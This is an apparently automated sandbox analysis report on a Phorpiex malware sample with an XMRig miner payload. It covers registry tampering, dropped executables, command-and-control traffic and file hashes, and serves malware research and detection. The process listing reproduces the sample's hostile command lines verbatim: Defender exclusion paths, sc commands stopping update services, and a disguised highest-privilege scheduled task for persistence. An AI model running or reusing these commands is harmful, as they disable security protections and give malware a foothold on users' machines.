Analysis Overview
SHA256
27df607e4a1cbfc7c3a99a8b7d4644b85502a80587772dbac4975e08c7189e98
Threat Level: Known bad
The file 2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Modifies security service
Phorphiex family
Phorphiex, Phorpiex
xmrig
Phorphiex payload
Xmrig family
Suspicious use of NtCreateUserProcessOtherParentProcess
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Stops running service(s)
Windows security modification
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-06 14:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 14:46
Reported
2024-11-06 14:48
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | C:\Windows\sysppvrdnvs.exe | N/A |
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1900 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\2155214652.exe | C:\Windows\Explorer.EXE |
| PID 1900 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\2155214652.exe | C:\Windows\Explorer.EXE |
| PID 976 created 3444 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 976 created 3444 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 976 created 3444 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\sysppvrdnvs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\105765520.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A49C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\105765520.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1428129604.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1252821226.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2155214652.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1623412542.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 976 set thread context of 1172 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 976 set thread context of 3908 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
| File opened for modification | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1623412542.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysppvrdnvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1428129604.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1252821226.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\A49C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe"
C:\Users\Admin\AppData\Local\Temp\A49C.exe
"C:\Users\Admin\AppData\Local\Temp\A49C.exe"
C:\Users\Admin\AppData\Local\Temp\1303511795.exe
C:\Users\Admin\AppData\Local\Temp\1303511795.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\sc.exe
sc stop UsoSvc
C:\Windows\SysWOW64\sc.exe
sc stop WaaSMedicSvc
C:\Windows\SysWOW64\sc.exe
sc stop wuauserv
C:\Windows\SysWOW64\sc.exe
sc stop DoSvc
C:\Windows\SysWOW64\sc.exe
sc stop BITS /wait
C:\Users\Admin\AppData\Local\Temp\105765520.exe
C:\Users\Admin\AppData\Local\Temp\105765520.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\1428129604.exe
C:\Users\Admin\AppData\Local\Temp\1428129604.exe
C:\Users\Admin\AppData\Local\Temp\1252821226.exe
C:\Users\Admin\AppData\Local\Temp\1252821226.exe
C:\Users\Admin\AppData\Local\Temp\2155214652.exe
C:\Users\Admin\AppData\Local\Temp\2155214652.exe
C:\Users\Admin\AppData\Local\Temp\1623412542.exe
C:\Users\Admin\AppData\Local\Temp\1623412542.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| KZ | 2.135.121.134:40500 | udp | |
| KZ | 89.218.184.42:40500 | tcp | |
| US | 8.8.8.8:53 | 134.121.135.2.in-addr.arpa | udp |
| UZ | 213.206.50.15:40500 | udp | |
| US | 8.8.8.8:53 | 15.50.206.213.in-addr.arpa | udp |
| IR | 5.202.245.192:40500 | udp | |
| US | 8.8.8.8:53 | 192.245.202.5.in-addr.arpa | udp |
| UZ | 89.249.62.7:40500 | udp | |
| US | 8.8.8.8:53 | 7.62.249.89.in-addr.arpa | udp |
| KZ | 89.218.172.78:40500 | udp | |
| US | 8.8.8.8:53 | 78.172.218.89.in-addr.arpa | udp |
| SY | 185.145.237.247:40500 | udp | |
| MX | 189.150.35.54:40500 | tcp | |
| US | 8.8.8.8:53 | 247.237.145.185.in-addr.arpa | udp |
| YE | 81.91.31.245:40500 | udp | |
| US | 8.8.8.8:53 | 245.31.91.81.in-addr.arpa | udp |
| IR | 185.71.152.222:40500 | udp | |
| US | 8.8.8.8:53 | 222.152.71.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| IR | 5.219.43.38:40500 | udp | |
| US | 8.8.8.8:53 | 38.43.219.5.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| IR | 2.190.148.34:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 34.148.190.2.in-addr.arpa | udp |
| KZ | 92.46.228.246:40500 | udp | |
| US | 8.8.8.8:53 | 246.228.46.92.in-addr.arpa | udp |
| US | 198.163.203.205:40500 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| IR | 188.213.103.164:40500 | udp | |
| US | 8.8.8.8:53 | 164.103.213.188.in-addr.arpa | udp |
| KG | 217.29.20.226:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 226.20.29.217.in-addr.arpa | udp |
| KZ | 88.204.243.150:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | 150.243.204.88.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| IR | 78.38.107.167:40500 | udp | |
| US | 8.8.8.8:53 | 167.107.38.78.in-addr.arpa | udp |
| IR | 5.235.177.163:40500 | udp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 163.177.235.5.in-addr.arpa | udp |
| BY | 46.56.85.158:40500 | tcp | |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| AO | 129.122.232.67:40500 | udp | |
| US | 8.8.8.8:53 | 67.232.122.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| UZ | 90.156.194.63:40500 | udp | |
| US | 8.8.8.8:53 | 63.194.156.90.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\A49C.exe
| MD5 | 8d8e6c7952a9dc7c0c73911c4dbc5518 |
| SHA1 | 9098da03b33b2c822065b49d5220359c275d5e94 |
| SHA256 | feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278 |
| SHA512 | 91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645 |
C:\Users\Admin\AppData\Local\Temp\1303511795.exe
| MD5 | 06560b5e92d704395bc6dae58bc7e794 |
| SHA1 | fbd3e4ae28620197d1f02bfc24adaf4ddacd2372 |
| SHA256 | 9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d |
| SHA512 | b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3 |
memory/1988-17-0x0000000005080000-0x00000000050B6000-memory.dmp
memory/1988-18-0x0000000005730000-0x0000000005D58000-memory.dmp
memory/1988-19-0x00000000056A0000-0x00000000056C2000-memory.dmp
memory/1988-20-0x0000000005F90000-0x0000000005FF6000-memory.dmp
memory/1988-21-0x0000000006000000-0x0000000006066000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdqetpzs.tnp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1988-31-0x0000000006070000-0x00000000063C4000-memory.dmp
memory/1988-32-0x0000000006640000-0x000000000665E000-memory.dmp
memory/1988-33-0x0000000006670000-0x00000000066BC000-memory.dmp
memory/1988-34-0x0000000006C50000-0x0000000006C82000-memory.dmp
memory/1988-35-0x000000006F550000-0x000000006F59C000-memory.dmp
memory/1988-45-0x0000000007840000-0x000000000785E000-memory.dmp
memory/1988-46-0x0000000007860000-0x0000000007903000-memory.dmp
memory/1988-47-0x0000000008030000-0x00000000086AA000-memory.dmp
memory/1988-48-0x0000000007980000-0x000000000799A000-memory.dmp
memory/1988-49-0x00000000079F0000-0x00000000079FA000-memory.dmp
memory/1988-50-0x0000000007C00000-0x0000000007C96000-memory.dmp
memory/1988-51-0x0000000007B90000-0x0000000007BA1000-memory.dmp
memory/1988-52-0x0000000007BC0000-0x0000000007BCE000-memory.dmp
memory/1988-53-0x0000000007BD0000-0x0000000007BE4000-memory.dmp
memory/1988-54-0x0000000007CC0000-0x0000000007CDA000-memory.dmp
memory/1988-55-0x0000000007CA0000-0x0000000007CA8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H4VCA4X1\1[1]
| MD5 | 1fcb78fb6cf9720e9d9494c42142d885 |
| SHA1 | fef9c2e728ab9d56ce9ed28934b3182b6f1d5379 |
| SHA256 | 84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02 |
| SHA512 | cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3 |
C:\Users\Admin\AppData\Local\Temp\105765520.exe
| MD5 | cb8420e681f68db1bad5ed24e7b22114 |
| SHA1 | 416fc65d538d3622f5ca71c667a11df88a927c31 |
| SHA256 | 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea |
| SHA512 | baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf |
memory/3684-76-0x0000000000B50000-0x0000000000B56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1428129604.exe
| MD5 | 0c37ee292fec32dba0420e6c94224e28 |
| SHA1 | 012cbdddaddab319a4b3ae2968b42950e929c46b |
| SHA256 | 981d724feebc36777e99513dc061d1f009e589f965c920797285c46d863060d1 |
| SHA512 | 2b60b571c55d0441ba0cfc695f9db5cd12660ebec7effc7e893c3b7a1c6cb6149df487c31b8d748697e260cbc4af29331592b705ea9638f64a711c7a6164628b |
C:\Users\Admin\AppData\Local\Temp\1252821226.exe
| MD5 | 96509ab828867d81c1693b614b22f41d |
| SHA1 | c5f82005dbda43cedd86708cc5fc3635a781a67e |
| SHA256 | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744 |
| SHA512 | ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca |
C:\Users\Admin\AppData\Local\Temp\2155214652.exe
| MD5 | 13b26b2c7048a92d6a843c1302618fad |
| SHA1 | 89c2dfc01ac12ef2704c7669844ec69f1700c1ca |
| SHA256 | 1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256 |
| SHA512 | d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455 |
C:\Users\Admin\AppData\Local\Temp\1623412542.exe
| MD5 | c1c2524e6fc9dc3f492248f09cf37d32 |
| SHA1 | fabcb2a675dcb31070d763a2fabc90259921a20d |
| SHA256 | d7c3ed2599c214b4dbcdbb34d2f378cc5a99833cc051143338bf848cc87fda97 |
| SHA512 | ead31dbcd27538dcd734f7568441dc733ae472dbcc475308b69e90f13cc5b1fda5e13afab4241b18006e81b8e52ff9894685a4e8d2cf9161d2b77716119de89f |
memory/216-104-0x000001BB5B0A0000-0x000001BB5B0C2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cefdf76e0ecda210af3b3b6bb30e4099 |
| SHA1 | 2391475958c37e02c0bab18b04db0d679a7d7b94 |
| SHA256 | 8f1eb32d6e755d4f1be30213deae872c1ff3cd1a1f8d33356b408b2ec4f35158 |
| SHA512 | 1ecead934fad44c60796d9f6e4ff0b1aac55e3aa1f1040d18c11a951a630c993b4b0d57c4b4dbdc0dc308397d1dfe2c7c2bdd4ece1a5b003aa13c28c3ccfc8fb |
memory/1900-119-0x00007FF7FA660000-0x00007FF7FABF7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | fee026663fcb662152188784794028ee |
| SHA1 | 3c02a26a9cb16648fad85c6477b68ced3cb0cb45 |
| SHA256 | dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b |
| SHA512 | 7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d95b08252ed624f6d91b46523f110f29 |
| SHA1 | 17577997bc1fb5d3fbe59be84013165534415dc3 |
| SHA256 | 342ce7c39bf9992d31d4b61ef138b2b084c96c74736ed00bb19aae49be16ca02 |
| SHA512 | 0c4288176d56f4ee6d8f08f568fba07ad859f50a395c39d2afd3baf55d3d29ca065a1ce305d1bd790477c35977c0ffa230543e805622f80a77bcee71b24eb257 |
memory/976-137-0x00007FF60E790000-0x00007FF60ED27000-memory.dmp
memory/3908-138-0x000001EE9C480000-0x000001EE9C4A0000-memory.dmp
memory/1172-139-0x00007FF783420000-0x00007FF783449000-memory.dmp
memory/3908-140-0x00007FF6B6610000-0x00007FF6B6DFF000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 14:46
Reported
2024-11-06 14:48
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" | C:\Windows\sysppvrdnvs.exe | N/A |
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2064 created 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | C:\Windows\Explorer.EXE |
| PID 2064 created 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | C:\Windows\Explorer.EXE |
| PID 1340 created 1200 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 1340 created 1200 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 1340 created 1200 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
